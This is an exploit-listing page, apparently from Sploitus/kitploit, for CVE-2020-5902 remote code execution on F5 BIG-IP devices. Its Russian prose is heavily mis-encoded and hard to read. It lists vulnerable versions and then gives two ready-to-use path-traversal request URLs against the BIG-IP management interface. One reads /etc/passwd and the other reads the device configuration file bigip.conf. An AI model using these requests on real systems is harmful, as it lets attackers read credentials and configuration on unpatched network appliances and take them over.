Sploitus

Exploit for RCE

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JSEC1337-RCE-CVE-2020-5902
# RCE-CVE-2020-5902

Π£Π΄Π°Π»Ρ‘Π½Π½ΠΎΠ΅ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π° Π½Π° BIG-IP F5

# ОписаниС

Π­Ρ‚ΠΈ Π°Ρ‚Π°ΠΊΠΈ Π½Π°Ρ†Π΅Π»Π΅Π½Ρ‹ Π½Π° BIG-IP β€” ΠΌΠ½ΠΎΠ³ΠΎΡ†Π΅Π»Π΅Π²ΠΎΠ΅ сСтСвоС устройство, ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΠΌΠΎΠ΅ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠ΅ΠΉ F5 Networks. Устройства BIG-IP ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ настроСны для Ρ€Π°Π±ΠΎΡ‚Ρ‹ Π² качСствС систСм формирования Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ°, балансировщиков Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ, мСТсСтСвых экранов, шлюзов доступа, ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡ΠΈΡ‚Π΅Π»Π΅ΠΉ скорости ΠΈΠ»ΠΈ SSL-ΠΏΡ€ΠΎΠΌΠ΅ΠΆΡƒΡ‚ΠΎΡ‡Π½ΠΎΠ³ΠΎ ПО.

Π’ срСду компания F5 Networks ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π»Π° исправлСния ΠΈ выпустила Π±ΡŽΠ»Π»Π΅Ρ‚Π΅Π½ΡŒ бСзопасности ΠΎΠ± уязвимости Β«ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠ΅ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π°Β» Π² устройствах BIG-IP.

По словам F5, ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ, отслСТиваСмая ΠΊΠ°ΠΊ CVE-2020-5902, ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΠΎΠ·Π²ΠΎΠ»ΠΈΡ‚ΡŒ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΏΠΎΠ»Π½Ρ‹ΠΉ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒ Π½Π°Π΄ Π½Π΅Π·Π°ΠΏΠ°Ρ‚Ρ‡Π΅Π½Π½Ρ‹ΠΌΠΈ систСмами, доступными Ρ‡Π΅Ρ€Π΅Π· ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚.

root@kitploit:~
    
    
    Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
    Vulnerability             : Remote Code Execution (RCE) 
    Score CVE                 : 10/10
    

# Эксплойт

root@kitploit:~
    
    
    https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    

root@kitploit:~
    
    
    https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf